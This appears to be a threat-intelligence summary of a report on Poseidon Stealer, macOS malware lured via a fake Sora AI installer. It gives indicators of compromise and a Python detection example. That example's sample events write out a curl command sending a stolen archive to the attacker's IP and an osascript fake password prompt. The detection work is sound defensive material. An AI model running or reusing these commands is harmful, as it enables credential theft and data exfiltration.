Poseidon Stealer Deploys Sopha AI Bait to Compromise macOS Systems

Threat researchers from eSentire TRU analyzed Poseidon Stealer, a macOS-targeting malware that disguises itself as legitimate software to steal sensitive data. The report emphasizes user awareness and endpoint monitoring as key defenses against this deception and data exfiltration campaign. #PoseidonStealer #macOS #SoraAI #OpenAI #GoogleAds

Keypoints

  • Poseidon Stealer was identified by eSentire’s Threat Response Unit (TRU) in August 2024 as targeting macOS devices.
  • Initial access occurred via a drive-by download from a Google Ads link leading to a DMG masquerading as a Sora AI installer.
  • The malware disguises itself as legitimate software (InstallSoraAI.dmg) and uses terminal tricks to evade detection (e.g., disown, pkill Terminal).
  • It collects data from browsers, Keychain, Notes, documents, wallets, VPN configs, and more, up to a 210 MB limit, before exfiltration.
  • Exfiltration is performed to a remote server via curl with custom headers (UUID, buildid, username).
  • TRU recommends user training (PSAT), a corporate software center, and strong endpoint protection, plus monitoring of AppleScript/osascript execution.
  • Indicators of compromise and detailed steps are provided in TRU notes and linked resources.

MITRE Techniques

  • [T1071.001] Initial Access – Drive-by download via malicious links.
  • [T1203] Execution – Execution of malicious payload disguised as legitimate software.
  • [T1053] Persistence – Using terminal commands to maintain persistence.
  • [T1555] Credential Access – Fake password prompts to capture user credentials.
  • [T1041] Exfiltration – Exfiltration of collected data to a remote server using curl.

Indicators of Compromise

  • [File Name] – InstallSoraAI.dmg, out.zip
  • [Directory] – /tmp/xuyna/
  • [File Name] – masterpass-chrome
  • [IP Address] – 45.93.20.174 (defanged: 45.93.20[.]174)
  • [URL] – hxxp://45.93.20[.]174/p2p
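To show how the behaviours in the keypoints and the indicators above can be turned into a simple triage rule set for process-execution telemetry, here is an added example (not code from the eSentire report). The event format, the sample events and the header names in the curl command line are constructed; the osascript "hidden answer" dialog pattern is an assumption about what a fake password prompt looks like, since the report itself only says fake prompts are used and osascript should be monitored.

```python
import re
from collections import defaultdict

# Constructed process-execution events, formatted as "user|parent|command line".
# The field layout is an assumption of this example, not any particular EDR's schema.
SAMPLE_EVENTS = [
    "alice|Finder|/usr/bin/osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
    "alice|bash|/usr/bin/pkill Terminal",
    "alice|bash|/usr/bin/curl -X POST -H 'uuid: 1111' -H 'buildid: 22' -H 'user: alice' "
    "--data-binary @/tmp/xuyna/out.zip http://45.93.20.174/p2p",
    "bob|Terminal|/usr/bin/osascript /Users/bob/scripts/backup.scpt",
    "bob|bash|/usr/bin/curl -s https://example.com/health",
]

# Indicators taken from the TRU note above. The osascript dialog pattern is an
# assumption about how a fake password prompt would be built (AppleScript's
# "with hidden answer" masks the typed text); it is not a string quoted by the report.
IOC_STRINGS = ("/tmp/xuyna/", "out.zip", "masterpass-chrome", "InstallSoraAI.dmg", "45.93.20.174")

RULES = {
    "fake_password_prompt": re.compile(r"osascript.*display dialog.*hidden answer", re.I),
    "terminal_kill": re.compile(r"\bpkill\s+Terminal\b"),
    "curl_custom_headers": re.compile(r"\bcurl\b.*-H\s+'?(uuid|buildid|user)", re.I),
    "known_ioc": re.compile("|".join(re.escape(s) for s in IOC_STRINGS)),
}

def scan_events(events):
    """Return {user: sorted rule names} for every user whose events matched a rule."""
    hits = defaultdict(set)
    for line in events:
        user, _parent, cmd = line.split("|", 2)
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                hits[user].add(name)
    return {u: sorted(r) for u, r in hits.items()}

def triage(events, threshold=2):
    """Escalate users who trip at least `threshold` distinct rules; a lone osascript
    run (e.g. a user's own backup script) stays below the bar."""
    return sorted(u for u, rules in scan_events(events).items() if len(rules) >= threshold)

if __name__ == "__main__":
    for user, rules in scan_events(SAMPLE_EVENTS).items():
        print(f"{user}: {', '.join(rules)}")
    print("escalate:", triage(SAMPLE_EVENTS))
```

The threshold keeps routine osascript or curl use from paging anyone while the combination of a hidden-answer dialog, a Terminal kill and a curl POST carrying the report's headers and paths lands in the escalation list.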

Read more: https://www.esentire.com/blog/poseidon-stealer-uses-sopha-ai-lure-to-infect-macos